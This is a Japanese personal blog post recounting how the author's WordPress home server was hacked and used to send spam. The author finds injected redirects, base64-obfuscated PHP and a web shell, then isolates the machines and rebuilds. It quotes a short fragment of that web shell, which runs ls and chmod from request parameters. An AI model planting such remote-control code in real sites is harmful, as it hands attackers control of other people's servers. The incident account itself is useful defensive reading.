いやぁ、お恥ずかしい話なんですが、SPAMや、フィッシングの踏み台にされました。
ある朝のこと、たまたまWebサーバのディレクトリのルートをlsすると見に覚えの無いディレクトリが。。。
なんじゃこりゃ。dyb/やらozb/やら。
中には、 全く知らないサイトへリダイレクトするコードが、index.phpの中に。。あ、やられた。
ということで、応急処置。とりあえず、ルートを掃除して、今までついていた、書き込み権を消す、パスワードを変更。あとは、仕事から帰ってきてからじっくりやるか。。。
仕事から帰ってきてみると、うちのインターネットのプロバイダのAT&Tからメールが、、、
AT&T IISS Network Security
Your AT&T U-verse Site ID is: XXXX IP: XXX.XXX.XXX.XXX (issue XXXX)
IMPORTANT COMPUTER SAFETY NOTICE from AT&T Internet Services
Security Center -“Suspicious email traffic detected”.
最初、ただのSPAMかと思った。でも、Billing Acctの下4桁が書かれてて、ちゃんと合ってるし、ぐぐってみると、本物っぽい。Suspicious email traffiということで、SPAMの踏み台にされたのが確定。
あっちゃ〜。
ということで、家中のパソコンのLANケーブルをぶっこ抜いて、隔離。
あ〜あ、やっちゃった。と凹みつつも、家中のパソコンのウィルスチェック。サーバー以外の感染は認められない。
ということで、サーバの中を探索。/var/wwwの中をごそごそと覗く。
wordpressの中に、wp-content/robots1FzZ.phpなるファイルを発見。中には、$vで始まる文字列の塊でphpのコードが書かれている。MAIL FROMとかの文字列も見られる。こいつか〜。やられたな〜。
それ以外にも、wp-content/themesの中の現在使っているテーマのphpも見に覚えの無いファイルがいくつか。eval ( base64_decode(“…で偽装しているファイルがあったり。
plugview.phpなるファイルなんて
switch ($_REQUEST[‘a’])
{
case ‘ls’ :
show_ls($_REQUEST[‘p1’]);
break;
case ‘chmod’ :
chmod ($_REQUEST[‘p1’], $_REQUEST[‘p2’]);
show_ls();
break;
なーんてなコードが。。。
まじっすか。この時点で、このハードディスクのフォーマットを決心。
全部のバックアップはあるんだけど、どの時点でもらってるのか不安だし、MySqlのDBを書き戻して、DBの中にスクリプト埋められてて再発してもな〜。そのまま書き戻すんじゃなくて、ひとつひとつ確認しながら作りなおしたほうがいいよなー。ということで、サイトの再構築が始まったのでした。